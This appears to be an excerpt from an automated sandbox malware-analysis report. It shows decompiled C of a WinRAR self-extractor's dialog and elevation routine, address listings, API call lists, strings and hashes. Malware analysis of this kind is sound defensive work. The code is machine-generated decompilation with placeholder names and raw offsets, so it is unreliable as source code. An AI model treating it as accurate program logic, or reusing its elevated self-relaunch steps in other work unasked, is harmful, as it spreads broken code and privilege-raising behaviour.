									_t173 =  *0x41a471;
									__eflags = _t173;
									if(_t173 != 0) {
										L48:
										__eflags =  *((char*)(_t328 - 0xe));
										if( *((char*)(_t328 - 0xe)) != 0) {
											 *0x41844c = _t293;
											E003D12F1(_t311, 0x67, 0);
											E003D12F1(_t311, 0x66, 0);
											SetDlgItemTextW(_t311, _t293, E003DE617(0xe6)); // executed
											E003D12F1(_t311, 0x69, _t293);
											SetDlgItemTextW(_t311, 0x65, 0x4035f4); // executed
											_t322 = GetDlgItem(_t311, 0x65);
											__eflags = _t322;
											if(_t322 != 0) {
												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
												__eflags = _t210;
												SetWindowLongW(_t322, 0xfffffff0, _t210);
											}
											_push(5);
											_push( *0x42fc90);
											_push(_t311);
											E003EC73F(_t309, _t311);
											_push(2);
											_push( *0x42fc90);
											_push(_t311);
											E003EC73F(_t309, _t311);
											_push(0x42ec90);
											_push(_t311);
											 *0x431cbc = _t293; // executed
											E003EDA52(_t302, _t309, __eflags); // executed
											_push(6);
											_push( *0x42fc90);
											 *0x431cbc = 0;
											_push(_t311);
											E003EC73F(_t309, _t311);
											__eflags =  *0x418454;
											if( *0x418454 == 0) {
												__eflags =  *0x41845c;
												if( *0x41845c == 0) {
													__eflags =  *0x42fcac;
													if( *0x42fcac == 0) {
														_push(4);
														_push( *0x42fc90);
														_push(_t311); // executed
														E003EC73F(_t309, _t311); // executed
													}
												}
											}
											E003D12D3(_t311, _t293, _t293);
											 *0x41844c =  *0x41844c & 0x00000000;
											__eflags =  *0x41844c;
											_t186 =  *0x418454; // 0x1
											goto L73;
										}
										__eflags = _t173;
										if(_t173 != 0) {
											goto L65;
										}
										goto L50;
									} else {
										__eflags = _t302;
										if(_t302 == 0) {
											L50:
											_t220 =  *(_t328 - 0xd);
											__eflags = _t220;
											 *(_t328 - 0xd) = _t220 == 0;
											__eflags = _t220;
											if(_t220 == 0) {
												L64:
												__eflags =  *(_t328 - 0xd);
												if( *(_t328 - 0xd) == 0) {
													L11:
													_push(0);
													goto L25;
												}
												L65:
												_push(E003DE617(0x9a));
												E003D4092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
												E003D6D83(0x411098, _t293);
												E003EA7E4(_t311, _t328 - 0x3874, E003DE617(0x96), 0x30);
												 *0x41845c =  *0x41845c + 1;
												goto L11;
											}
											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
											E003DF28C(0x41c472, _t328 - 0x574, 0x80);
											_push(0x41b472);
											E003D4092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
											_t330 = _t330 + 0x14;
											 *(_t328 - 0x58) = 0x3c;
											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
											 *(_t328 - 0x50) = _t311;
											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
											 *(_t328 - 0x3c) = _t293;
											 *((intOrPtr*)(_t328 - 0x38)) = 0;
											 *((intOrPtr*)(_t328 - 0x40)) = 0x418468;
											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
											 *(_t328 - 0x14) = _t325;
											__eflags = _t325;
											if(_t325 == 0) {
												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
											} else {
												 *0x427b80 = 0;
												_t245 = GetCommandLineW();
												__eflags = _t245;
												if(_t245 != 0) {
													E003E0602(0x427b82, _t245, 0x2000);
												}
												E003EB425(0x41c472, 0x42bb82, 7);
												E003EB425(0x41c472, 0x42cb82, 2);
												E003EB425(0x41c472, 0x42db82, 0x10);
												 *0x42ec83 = _t293;
												E003DF3FA(_t293, 0x42eb82, _t328 - 0x574);
												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
												E003F0320(_t252, 0x427b80, 0x7104);
												_t330 = _t330 + 0xc;
											}
											_t234 = ShellExecuteExW(_t328 - 0x58);
											E003DF445(_t328 - 0x574, 0x80);
											E003DF445(_t328 - 0xfe8c, 0x430c);
											__eflags = _t234;
											if(_t234 == 0) {
												_t327 =  *(_t328 - 0x1c);
												 *(_t328 - 0xd) = _t293;
												goto L62;
											} else {
												 *0x4330a4( *(_t328 - 0x20), 0x2710);
												_t67 = _t328 - 0x18;
												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
												__eflags =  *_t67;
												_t327 =  *(_t328 - 0x1c);
												while(1) {
													__eflags =  *_t327;
													if( *_t327 != 0) {
														break;
													}
													Sleep(0x64);
													_t244 =  *(_t328 - 0x18) + 1;
													 *(_t328 - 0x18) = _t244;
													__eflags = _t244 - 0x64;
													if(_t244 < 0x64) {
														continue;
													}
													break;
												}
												 *0x42fcac =  *(_t328 - 0x20);
												L62:
												__eflags =  *(_t328 - 0x14);
												if( *(_t328 - 0x14) != 0) {
													UnmapViewOfFile(_t327);
													CloseHandle( *(_t328 - 0x14));
												}
												goto L64;
											}
										}
										E003D4092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
										_t330 = _t330 + 0x10;
										E003D9556(_t328 - 0x34ac);
										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
										_t260 = E003D966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
										 *((char*)(_t328 - 0xe)) = _t260;
										__eflags = _t260;
										if(_t260 == 0) {
											_t262 = GetLastError();
											__eflags = _t262 - 5;
											if(_t262 == 5) {
												 *(_t328 - 0xd) = _t293;
											}
										}
										_t37 = _t328 - 4;
										 *_t37 =  *(_t328 - 4) | 0xffffffff;
										__eflags =  *_t37;
										_t302 = _t328 - 0x34ac;
										E003D959A(_t328 - 0x34ac); // executed
										_t173 =  *0x41a471;
										goto L48;
									}
								} else {
									_t264 = GetLastError();
									__eflags = _t264 - 5;
									if(_t264 == 5) {
										L38:
										 *(_t328 - 0xd) = _t293;
										goto L39;
									}
									__eflags = _t264 - 3;
									if(_t264 != 3) {
										goto L39;
									}
									goto L38;
								}
							} else {
								_t186 = _t293;
								 *0x418454 = _t186;
								L73:
								__eflags =  *0x41845c;
								if( *0x41845c <= 0) {
									goto L24;
								}
								__eflags = _t186;
								if(_t186 != 0) {
									goto L24;
								}
								 *0x418455 = _t293;
								SetDlgItemTextW(_t311, _t293, E003DE617(0x90));
								_t323 =  *0x411098;
								__eflags = _t323 - 9;
								if(_t323 != 9) {
									__eflags = _t323 - 3;
									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
								} else {
									_t193 = 0xa0;
								}
								E003E0602(_t328 - 0x474, E003DE617(_t193), 0x200);
								__eflags = _t323 - 9;
								if(_t323 == 9) {
									__eflags =  *0x41c574;
									if( *0x41c574 != 0) {
										_t201 = E003F3E13(_t328 - 0x474);
										_t202 = E003DE617(0xa1);
										__eflags = 0x200;
										E003D4092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
									}
								}
								E003EA7E4(_t311, _t328 - 0x474, E003DE617(0x96), 0x30);
								goto L128;
							}
						}
						_t293 = 1;
						__eflags =  *0x418456;
						if( *0x418456 == 0) {
							goto L24;
						}
						goto L23;
					}
					__eflags =  *0x431cbc;
					if( *0x431cbc == 0) {
						goto L21;
					} else {
						__eflags =  *0x431cbd;
						 *0x431cbd = _t152 & 0xffffff00 |  *0x431cbd == 0x00000000;
						SetDlgItemTextW(_t311, 1, E003DE617(((_t152 & 0xffffff00 |  *0x431cbd == 0x00000000) & 0x000000ff) + 0xe6));
						while(1) {
							__eflags =  *0x431cbd;
							if( *0x431cbd == 0) {
								goto L128;
							}
							__eflags =  *0x418454;
							if( *0x418454 != 0) {
								goto L128;
							}
							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
							__eflags = _t278;
							if(_t278 == 0) {
								goto L128;
							} else {
								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
								__eflags = _t280;
								if(_t280 == 0) {
									TranslateMessage(_t328 - 0x74);
									DispatchMessageW(_t328 - 0x74);
								}
								continue;
							}
						}
						goto L128;
					}
				}
				_t285 = _t152 - 1;
				if(_t285 == 0) {
					__eflags =  *0x41844c;
					 *0x418454 = 1;
					if( *0x41844c == 0) {
						goto L11;
					}
					__eflags =  *0x41845c;
					if( *0x41845c != 0) {
						goto L128;
					}
					goto L11;
				}
				if(_t285 == 0x65) {
					_push(0x800);
					_t289 = E003D124F(_t311, E003DE617(0x64), _t328 - 0x1474);
					__eflags = _t289;
					if(_t289 == 0) {
						goto L128;
					} else {
						_push(_t328 - 0x1474);
						_push(0x66);
						goto L127;
					}
				}
				goto L6;
			}




















































                0x003eb7e0
                0x003eb7e0
                0x003eb7e5
                0x003eb7ef
                0x003eb7f6
                0x003eb7fa
                0x003eb80e
                0x003eb815
                0x003eb818
                0x003ec203
                0x003ec203
                0x003ec205
                0x003ec20b
                0x003ec213
                0x003ec213
                0x003eb81e
                0x003eb824
                0x003ebf0f
                0x003ebf10
                0x003ebf15
                0x003ebf1a
                0x003ebf20
                0x003ebf26
                0x003ebf28
                0x003ebf32
                0x003ebf32
                0x003ebf38
                0x003ebf3d
                0x003ebf3f
                0x003ebf4c
                0x003ebf4c
                0x003ebf55
                0x003ebf68
                0x003ebf6b
                0x003ebf7d
                0x003ebf85
                0x003ebf8b
                0x003ebf93
                0x003ebf95
                0x003ebf98
                0x003ebf9d
                0x003ebf9f
                0x003ebf9f
                0x003ebfa7
                0x003ebfae
                0x003ebfb3
                0x003ebfb8
                0x003ebfbd
                0x003ebfc2
                0x003ebfc3
                0x003ebfca
                0x003ebfcf
                0x003ebfd1
                0x003ebfd3
                0x003ebfd3
                0x003ebfd9
                0x003ebfe0
                0x003ebfe2
                0x003ebfe4
                0x003ebfea
                0x003ebfeb
                0x003ebfeb
                0x003ebff0
                0x003ebff7
                0x003ec007
                0x003ec01a
                0x003ec01a
                0x003ec020
                0x003ec027
                0x003ec0d8
                0x003ec0d8
                0x003ec0df
                0x003ec18b
                0x003ec18b
                0x003ec192
                0x003ec197
                0x003ec197
                0x003ec19d
                0x003ec1a4
                0x003ec1ab
                0x003ec1b5
                0x003ec1b5
                0x003ec1ba
                0x003ec1bf
                0x003ec1c1
                0x003ec1c3
                0x003ec1ca
                0x003ec1cc
                0x003ec1ce
                0x003ec1cf
                0x003ec1d4
                0x003ec1d5
                0x003ec1d7
                0x003ec1e1
                0x003ec1d9
                0x003ec1d9
                0x003ec1d9
                0x003ec1d7
                0x003ec1ca
                0x003ec1e7
                0x003ec1ee
                0x003ec1fa
                0x003ec1fb
                0x003ec1fc
                0x003ec1fd
                0x003ec1fd
                0x00000000
                0x003ec1ee
                0x003ec0e5
                0x003ec0ec
                0x00000000
                0x00000000
                0x003ec0f2
                0x003ec0f9
                0x00000000
                0x00000000
                0x003ec0ff
                0x003ec101
                0x003ec106
                0x003ec106
                0x003ec10d
                0x003ec10d
                0x003ec10d
                0x003ec10d
                0x003ec113
                0x00000000
                0x00000000
                0x003ec115
                0x003ec11c
                0x00000000
                0x00000000
                0x003ec11e
                0x003ec11e
                0x003ec124
                0x003ec132
                0x003ec143
                0x003ec15b
                0x00000000
                0x003ec15b
                0x003ec126
                0x003ec12d
                0x00000000
                0x00000000
                0x003ec12f
                0x003ec12f
                0x003ec160
                0x003ec161
                0x003ec161
                0x003ec169
                0x003ec183
                0x003ec188
                0x00000000
                0x003ec02d
                0x003ec02d
                0x003ec02f
                0x003ec035
                0x003ec036
                0x003ec03b
                0x003ec040
                0x003ec042
                0x003ec044
                0x003ec04b
                0x003ec04d
                0x003ec061
                0x003ec06c
                0x003ec071
                0x003ec04b
                0x003ec072
                0x003ec078
                0x003ec0cb
                0x003ec0cb
                0x003ec0cc
                0x003ec0d2
                0x003ec0d3
                0x00000000
                0x003ec07a
                0x003ec07b
                0x003ec081
                0x003ec087
                0x00000000
                0x00000000
                0x003ec089
                0x003ec090
                0x00000000
                0x00000000
                0x003ec092
                0x003ec094
                0x003ec09a
                0x003ec09b
                0x003ec0a0
                0x003ec0a7
                0x00000000
                0x00000000
                0x003ec0bd
                0x003ec0c3
                0x003ec0c5
                0x003eb958
                0x003eb958
                0x003eb95e
                0x003eb95e
                0x003eb95f
                0x003eb960
                0x00000000
                0x003eb960
                0x00000000
                0x003ec0c5
                0x003ec078
                0x003ec027
                0x003eb82c
                0x003eb841
                0x003eb841
                0x00000000
                0x003eb841
                0x003eb834
                0x003eb836
                0x003eb89b
                0x003eb8a2
                0x003eb92e
                0x003eb93d
                0x003eb943
                0x003eb94a
                0x003eb96b
                0x003eb972
                0x003eb983
                0x003eb989
                0x003eb990
                0x003eb992
                0x003eb99e
                0x003eb9b1
                0x003eb9b1
                0x003eb9b8
                0x003eb9be
                0x003eb9c5
                0x003eb9e0
                0x003eb9f4
                0x003eba01
                0x003eba24
                0x003eba29
                0x003eba32
                0x003eba33
                0x003eba35
                0x003eb9c7
                0x003eb9d1
                0x003eb9d2
                0x003eb9d4
                0x003eb9d9
                0x003eb9d9
                0x003eba3a
                0x003eba41
                0x003eba4a
                0x003eba4a
                0x003eba53
                0x003eba5f
                0x003eba64
                0x003eba66
                0x003eba7b
                0x003eba87
                0x003eba89
                0x003eba8c
                0x003eba8e
                0x003eba90
                0x003eba96
                0x003eba99
                0x003eba9c
                0x003eba9e
                0x003eba9e
                0x003eba9c
                0x003ebaa1
                0x003ebaa6
                0x003ebaa8
                0x003ebb16
                0x003ebb16
                0x003ebb1a
                0x003ebd5b
                0x003ebd61
                0x003ebd6b
                0x003ebd7d
                0x003ebd87
                0x003ebd94
                0x003ebda3
                0x003ebda5
                0x003ebda7
                0x003ebdb2
                0x003ebdb2
                0x003ebdbb
                0x003ebdbb
                0x003ebdc1
                0x003ebdc3
                0x003ebdc9
                0x003ebdca
                0x003ebdcf
                0x003ebdd1
                0x003ebdd7
                0x003ebdd8
                0x003ebddd
                0x003ebde2
                0x003ebde3
                0x003ebde9
                0x003ebdee
                0x003ebdf0
                0x003ebdf6
                0x003ebdfd
                0x003ebdfe
                0x003ebe03
                0x003ebe0a
                0x003ebe0c
                0x003ebe13
                0x003ebe15
                0x003ebe1c
                0x003ebe1e
                0x003ebe20
                0x003ebe26
                0x003ebe27
                0x003ebe27
                0x003ebe1c
                0x003ebe13
                0x003ebe2f
                0x003ebe34
                0x003ebe34
                0x003ebe3b
                0x00000000
                0x003ebe3b
                0x003ebb20
                0x003ebb22
                0x00000000
                0x00000000
                0x00000000
                0x003ebaaa
                0x003ebaaa
                0x003ebaac
                0x003ebb28
                0x003ebb28
                0x003ebb2b
                0x003ebb2d
                0x003ebb31
                0x003ebb33
                0x003ebcf1
                0x003ebcf1
                0x003ebcf5
                0x003eb894
                0x003eb894
                0x00000000
                0x003eb894
                0x003ebcfb
                0x003ebd05
                0x003ebd1e
                0x003ebd2c
                0x003ebd46
                0x003ebd4b
                0x00000000
                0x003ebd4b
                0x003ebb43
                0x003ebb5a
                0x003ebb5f
                0x003ebb7c
                0x003ebb81
                0x003ebb84
                0x003ebb91
                0x003ebb98
                0x003ebba1
                0x003ebbb9
                0x003ebbbc
                0x003ebbc3
                0x003ebbc6
                0x003ebbc9
                0x003ebbd6
                0x003ebbd8
                0x003ebbdb
                0x003ebbdd
                0x003ebc68
                0x003ebbe3
                0x003ebbe3
                0x003ebbea
                0x003ebbf0
                0x003ebbf2
                0x003ebbff
                0x003ebbff
                0x003ebc0b
                0x003ebc17
                0x003ebc23
                0x003ebc2e
                0x003ebc3a
                0x003ebc58
                0x003ebc5b
                0x003ebc60
                0x003ebc60
                0x003ebc6f
                0x003ebc83
                0x003ebc94
                0x003ebc99
                0x003ebc9b
                0x003ebcd5
                0x003ebcd8
                0x00000000
                0x003ebc9d
                0x003ebca5
                0x003ebcab
                0x003ebcab
                0x003ebcab
                0x003ebcaf
                0x003ebcb2
                0x003ebcb2
                0x003ebcb5
                0x00000000
                0x00000000
                0x003ebcb9
                0x003ebcc2
                0x003ebcc3
                0x003ebcc6
                0x003ebcc9
                0x00000000
                0x00000000
                0x00000000
                0x003ebcc9
                0x003ebcce
                0x003ebcdb
                0x003ebcdb
                0x003ebcdf
                0x003ebce2
                0x003ebceb
                0x003ebceb
                0x00000000
                0x003ebcdf
                0x003ebc9b
                0x003ebac2
                0x003ebac7
                0x003ebad0
                0x003ebad5
                0x003ebae8
                0x003ebaed
                0x003ebaf0
                0x003ebaf2
                0x003ebaf4
                0x003ebafa
                0x003ebafd
                0x003ebaff
                0x003ebaff
                0x003ebafd
                0x003ebb02
                0x003ebb02
                0x003ebb02
                0x003ebb06
                0x003ebb0c
                0x003ebb11
                0x00000000
                0x003ebb11
                0x003eba68
                0x003eba68
                0x003eba6e
                0x003eba71
                0x003eba78
                0x003eba78
                0x00000000
                0x003eba78
                0x003eba73
                0x003eba76
                0x00000000
                0x00000000
                0x00000000
                0x003eba76
                0x003eb974
                0x003eb974
                0x003eb976
                0x003ebe40
                0x003ebe40
                0x003ebe47
                0x00000000
                0x00000000
                0x003ebe4d
                0x003ebe4f
                0x00000000
                0x00000000
                0x003ebe5a
                0x003ebe68
                0x003ebe6e
                0x003ebe74
                0x003ebe77
                0x003ebe82
                0x003ebe8c
                0x003ebe8c
                0x003ebe79
                0x003ebe79
                0x003ebe79
                0x003ebea4
                0x003ebea9
                0x003ebeac
                0x003ebeae
                0x003ebeb5
                0x003ebebe
                0x003ebecb
                0x003ebed6
                0x003ebee8
                0x003ebeed
                0x003ebeb5
                0x003ebf05
                0x00000000
                0x003ebf05
                0x003eb972
                0x003eb94e
                0x003eb94f
                0x003eb956
                0x00000000
                0x00000000
                0x00000000
                0x003eb956
                0x003eb8a8
                0x003eb8af
                0x00000000
                0x003eb8b1
                0x003eb8b1
                0x003eb8bb
                0x003eb8d1
                0x003eb920
                0x003eb920
                0x003eb927
                0x003eb929
                0x003eb929
                0x003eb8d9
                0x003eb8e0
                0x00000000
                0x00000000
                0x003eb8ef
                0x003eb8f5
                0x003eb8f7
                0x00000000
                0x003eb8fd
                0x003eb902
                0x003eb908
                0x003eb90a
                0x003eb910
                0x003eb91a
                0x003eb91a
                0x00000000
                0x003eb90a
                0x003eb8f7
                0x00000000
                0x003eb920
                0x003eb8af
                0x003eb838
                0x003eb83a
                0x003eb878
                0x003eb87f
                0x003eb885
                0x00000000
                0x00000000
                0x003eb887
                0x003eb88e
                0x00000000
                0x00000000
                0x00000000
                0x003eb88e
                0x003eb83f
                0x003eb848
                0x003eb85d
                0x003eb862
                0x003eb864
                0x00000000
                0x003eb86a
                0x003eb870
                0x003eb871
                0x00000000
                0x003eb871
                0x003eb864
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 003EB7E5
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EB8D1
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB8EF
                • IsDialogMessageW.USER32(?,?), ref: 003EB902
                • TranslateMessage.USER32(?), ref: 003EB910
                • DispatchMessageW.USER32(?), ref: 003EB91A
                • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 003EB93D
                • EndDialog.USER32(?,00000001), ref: 003EB960
                • GetDlgItem.USER32(?,00000068), ref: 003EB983
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003EB99E
                • SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003EB9B1
                  • Part of subcall function 003ED453: _wcschr.LIBVCRUNTIME ref: 003ED45C
                  • Part of subcall function 003ED453: _wcslen.LIBCMT ref: 003ED47D
                • SetFocus.USER32(00000000), ref: 003EB9B8
                • _swprintf.LIBCMT ref: 003EBA24
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003ED4D4: GetDlgItem.USER32(00000068,0042FCB8), ref: 003ED4E8
                  • Part of subcall function 003ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,003EAF07,00000001,?,?,003EB7B9,0040506C,0042FCB8,0042FCB8,00001000,00000000,00000000), ref: 003ED510
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003ED51B
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003ED529
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED53F
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003ED559
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED59D
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003ED5AB
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED5BA
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED5E1
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,004043F4), ref: 003ED5F0
                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 003EBA68
                • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 003EBA90
                • GetTickCount.KERNEL32 ref: 003EBAAE
                • _swprintf.LIBCMT ref: 003EBAC2
                • GetLastError.KERNEL32(?,00000011), ref: 003EBAF4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 003EBB43
                • _swprintf.LIBCMT ref: 003EBB7C
                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 003EBBD0
                • GetCommandLineW.KERNEL32 ref: 003EBBEA
                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 003EBC47
                • ShellExecuteExW.SHELL32(0000003C), ref: 003EBC6F
                • Sleep.KERNEL32(00000064), ref: 003EBCB9
                • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 003EBCE2
                • CloseHandle.KERNEL32(00000000), ref: 003EBCEB
                • _swprintf.LIBCMT ref: 003EBD1E
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EBD7D
                • SetDlgItemTextW.USER32(?,00000065,004035F4), ref: 003EBD94
                • GetDlgItem.USER32(?,00000065), ref: 003EBD9D
                • GetWindowLongW.USER32(00000000,000000F0), ref: 003EBDAC
                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003EBDBB
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EBE68
                • _wcslen.LIBCMT ref: 003EBEBE
                • _swprintf.LIBCMT ref: 003EBEE8
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 003EBF32
                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 003EBF4C
                • GetDlgItem.USER32(?,00000068), ref: 003EBF55
                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 003EBF6B
                • GetDlgItem.USER32(?,00000066), ref: 003EBF85
                • SetWindowTextW.USER32(00000000,0041A472), ref: 003EBFA7
                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 003EC007
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EC01A
                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 003EC0BD
                • EnableWindow.USER32(00000000,00000000), ref: 003EC197
                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 003EC1D9
                  • Part of subcall function 003EC73F: __EH_prolog.LIBCMT ref: 003EC744
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EC1FD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^>$__tmp_rar_sfx_access_check_%u$h>$winrarsfxmappingfile.tmp$Q@
                • API String ID: 4093411769-888710539
                • Opcode ID: 0bf0b7fa1ab7c76db387bb5967c9e62ec4e90b0b818555b8ce4351a1119c72bd
                • Instruction ID: 8c521bed33d199decca48e70cf7fc9dd635c4daf35a301fa754c2783232099ca
                • Opcode Fuzzy Hash: 0bf0b7fa1ab7c76db387bb5967c9e62ec4e90b0b818555b8ce4351a1119c72bd
                • Instruction Fuzzy Hash: 9542E7719442A4BAEB23AF719C4AFBF7B7CAB01700F104275F644AA1D2CB745E45CB29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 268 3e0863-3e0886 call 3eec50 GetModuleHandleW 271 3e0888-3e089f GetProcAddress 268->271 272 3e08e7-3e0b48 268->272 275 3e08b9-3e08c9 GetProcAddress 271->275 276 3e08a1-3e08b7 271->276 273 3e0b4e-3e0b59 call 3f75fb 272->273 274 3e0c14-3e0c40 GetModuleFileNameW call 3dc29a call 3e0602 272->274 273->274 285 3e0b5f-3e0b8d GetModuleFileNameW CreateFileW 273->285 291 3e0c42-3e0c4e call 3db146 274->291 279 3e08cb-3e08e0 275->279 280 3e08e5 275->280 276->275 279->280 280->272 288 3e0b8f-3e0b9b SetFilePointer 285->288 289 3e0c08-3e0c0f CloseHandle 285->289 288->289 292 3e0b9d-3e0bb9 ReadFile 288->292 289->274 297 3e0c7d-3e0ca4 call 3dc310 GetFileAttributesW 291->297 298 3e0c50-3e0c5b call 3e081b 291->298 292->289 294 3e0bbb-3e0be0 292->294 296 3e0bfd-3e0c06 call 3e0371 294->296 296->289 304 3e0be2-3e0bfc call 3e081b 296->304 306 3e0cae 297->306 307 3e0ca6-3e0caa 297->307 298->297 309 3e0c5d-3e0c7b CompareStringW 298->309 304->296 311 3e0cb0-3e0cb5 306->311 307->291 310 3e0cac 307->310 309->297 309->307 310->311 313 3e0cec-3e0cee 311->313 314 3e0cb7 311->314 316 3e0dfb-3e0e05 313->316 317 3e0cf4-3e0d0b call 3dc2e4 call 3db146 313->317 315 3e0cb9-3e0ce0 call 3dc310 GetFileAttributesW 314->315 323 3e0cea 315->323 324 3e0ce2-3e0ce6 315->324 327 3e0d0d-3e0d6e call 3e081b * 2 call 3de617 call 3d4092 call 3de617 call 3ea7e4 317->327 328 3e0d73-3e0da6 call 3d4092 AllocConsole 317->328 323->313 324->315 326 3e0ce8 324->326 326->313 334 3e0df3-3e0df5 ExitProcess 327->334 333 3e0da8-3e0ded GetCurrentProcessId AttachConsole call 3f3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                C-Code - Quality: 72%
                			E003E0863(void* __edx, char _a3, unsigned int _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t111;
				int _t122;
				long _t133;
				void* _t149;
				_Unknown_base(*)()* _t168;
				struct _OVERLAPPED* _t174;
				struct _OVERLAPPED* _t175;
				signed char _t176;
				_Unknown_base(*)()* _t177;
				struct _OVERLAPPED* _t189;
				long _t190;
				void* _t191;
				_Unknown_base(*)()* _t192;
				struct HINSTANCE__* _t193;
				signed int _t195;
				struct _OVERLAPPED* _t196;
				signed int _t197;
				void* _t198;
				_Unknown_base(*)()* _t199;
				signed int _t200;
				int _t201;
				void* _t202;

				E003EEC50(0xb3cc);
